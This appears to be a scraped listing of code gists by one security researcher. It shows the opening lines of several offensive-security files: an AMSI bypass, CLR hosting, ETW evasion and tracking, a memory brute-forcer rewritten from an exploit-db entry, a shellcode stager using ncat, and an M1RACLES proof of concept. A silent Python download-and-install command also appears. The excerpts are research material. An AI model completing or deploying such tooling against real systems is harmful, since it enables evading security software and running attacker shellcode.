mkdir C:/temp/
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe" -OutFile "c:/temp/python-3.7.0.exe"
c:/temp/python-3.7.0.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long | |
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr | |
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Const CC_STDCALL = 4 | |
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr | |
Sub SayHello() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// memBruteforce.cpp by aaaddress1@chroot.org | |
// brute search loaded moudules in memory | |
// rewrite from https://www.exploit-db.com/exploits/45293 | |
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Exception-Based AMSI Bypass | |
// by aaaddress1@chroot.org | |
#include <amsi.h> | |
#include <iostream> | |
#include <Windows.h> | |
#pragma comment(lib, "amsi.lib") | |
#pragma comment(lib, "ole32.lib") | |
#pragma warning( disable : 4996 ) | |
#define AMSIPROJECTNAME L"scanner" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// CLR Hosting, by aaaddress1@chroot.org | |
// | |
// it's a new edition rewrite for .NET(4+) COM interface | |
// original from github.com/etormadiv/HostingCLR | |
// & blog.xpnsec.com/hiding-your-dotnet-etw | |
// | |
// this PoC supports the following .NET entry: | |
// >>>> static void Main(string[] args); | |
// | |
#include <stdio.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import etw | |
import etw.evntrace | |
import sys | |
import argparse | |
import threading | |
class RundownDotNetETW(etw.ETW): | |
def __init__(self, verbose, high_risk_only): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ETW CLR Tracker, by aaaddress1@chroot.org | |
// rewrite from post "Hiding your .NET - ETW" | |
// URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
#define AssemblyDCStart_V1 155 | |
#define AssemblyLoad_V1 154 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// simple stager, by aaaddress1@chroot.org | |
// using ncat to send shellcode payload, recv & execute. | |
#include <WS2tcpip.h> | |
#include <stdio.h> | |
#include <shlobj.h> | |
#include <Windows.h> | |
#include <shlwapi.h> | |
#include <winsock2.h> | |
#pragma warning(disable:4996) | |
#pragma comment(lib, "ws2_32.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// [Experiment] swich IME to Traditional Chinese | |
// $ g++ -m32 -static inputLockToZhTW.cpp && a | |
// test on League of Legends (TW) client, but got ignored :( | |
// by aaaddress1@chroot.org | |
#include <windows.h> | |
#include <iostream> | |
int main(void) { | |
for (char buf[64]; ; Sleep(150)) { | |
GetWindowTextA(GetForegroundWindow(), buf, sizeof(buf)); | |
// once found that LOL client is on the top, and send IME change requests |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
* | |
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
* | |
* Please visit m1racles.com for more information. | |
* | |
* Licensed under the MIT license. | |
*/ |